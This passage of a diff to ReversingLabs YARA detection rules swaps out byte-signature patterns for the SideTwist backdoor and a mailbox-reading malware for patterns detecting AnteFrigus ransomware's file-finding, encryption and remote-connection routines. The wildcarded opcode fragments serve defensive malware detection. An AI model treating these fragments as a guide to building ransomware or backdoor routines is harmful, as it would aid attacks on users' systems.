+            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ??
+            ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ??
+            ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
         }
-		$read_mailbox_folder = {
-            73 ?? ?? ?? ?? 0A 03 04 28 ?? ?? ?? ?? 26 1F ?? 0B 18 8D ?? ?? ?? ?? 25 16 7E ?? ??
-            ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 0C 17 08 13 ?? 11 ?? 73 ?? ?? ?? ?? 0D 07 73 ?? ??
-            ?? ?? 13 ?? 05 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 17 6F ??
-            ?? ?? ?? 11 ?? 18 6F ?? ?? ?? ?? 11 ?? 05 6F ?? ?? ?? ?? 0E ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 0E ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 04 11 ?? 11 ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ??
-            ?? ?? ?? 09 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 06 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ??
-            ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 2D ?? 03
-            04 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ??
-            ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 06 11 ?? 6F
-            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE
-            ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D
-            ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 7A 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ??
-            73 ?? ?? ?? ?? 25 80
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B
+            7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
         }
-		$add_move_to_inbox_rule = {
-            02 7B ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 0A DE ?? 0B 72 ?? ?? ?? ?? 07 25 2D ?? 26 14 2B ?? 6F ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 0C 72 ?? ??
-            ?? ?? 08 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 7A 00 73 ?? ?? ?? ?? 0D 09 05 6F ?? ?? ?? ?? 09 6F ?? ?? ??
-            ?? 0E ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 09 6F ??
-            ?? ?? ?? 16 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 04 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 2C ?? 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 2B ?? 04
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ??
-            ?? 09 73 ?? ?? ?? ?? 13 ?? 06 17 8D ?? ?? ?? ?? 25 16 11 ?? A2 17 6F ?? ?? ?? ?? 7E
-            ?? ?? ?? ?? 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13 ?? DE
+		$encrypt_files_p2 = {
+            6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ??
+            ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6
+            50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F
+            43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74
+        }
+		$encrypt_files_p3 = {
+            8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ??
+            8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85
+            ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ??
+            ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ??
+            EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ??
+            ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ??
+            8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A
+            ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
+            89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B
+        }
+		$remote_connection_p2 = {
+            00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ??
+            72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0
+            75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56
+            6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$enum_resources_p1 = {
+            33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56
+            ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B
+            06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ??
+            C7 45 ?? ?? ?? ?? ?? 0F 82
+        }
+		$enum_resources_p2 = {
+            8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A
+            ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ??
+            8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ??
+            ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$enum_resources_p3 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
+            64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
+            8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ??
+            8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ??
+            0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ??
+            8D 51 ?? 3B D0 74
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $fetch_commands ) and ( $read_mailbox_folder ) and ( $add_move_to_inbox_rule )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects SideTwist backdoor."
+		description = "Yara rule that detects AnteFrigus ransomware."
 		author = "ReversingLabs"
-		id = "979b442e-8739-54a8-b486-39fc5673791e"
-		date = "2024-03-18"
-		modified = "2024-03-18"
+		id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada"
+		date = "2021-03-05"
+		modified = "2021-03-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31"
+		logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "SideTwist"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AnteFrigus"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$anti_sandbox_detect_environment = {
-            55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ??
-            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C
-            8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85
-            C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ??
-            ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB
+		$find_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0
+            89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45
+            ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D
+            ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B
+            CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B
+            CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ??
+            8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9
+            ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45
         }
-		$collect_host_information = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48
-            89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
-            8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ??
-            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
-            48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ??
-            48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
-            48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89
-            C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D
-            45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+		$find_files_p2 = {
+            3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F
+            43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83
+            61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ??
+            ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ??
+            ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ??
+            ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ??
+            59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8
         }
-		$contact_c2_server = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ??
-            ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45
-            ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89
-            C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ??
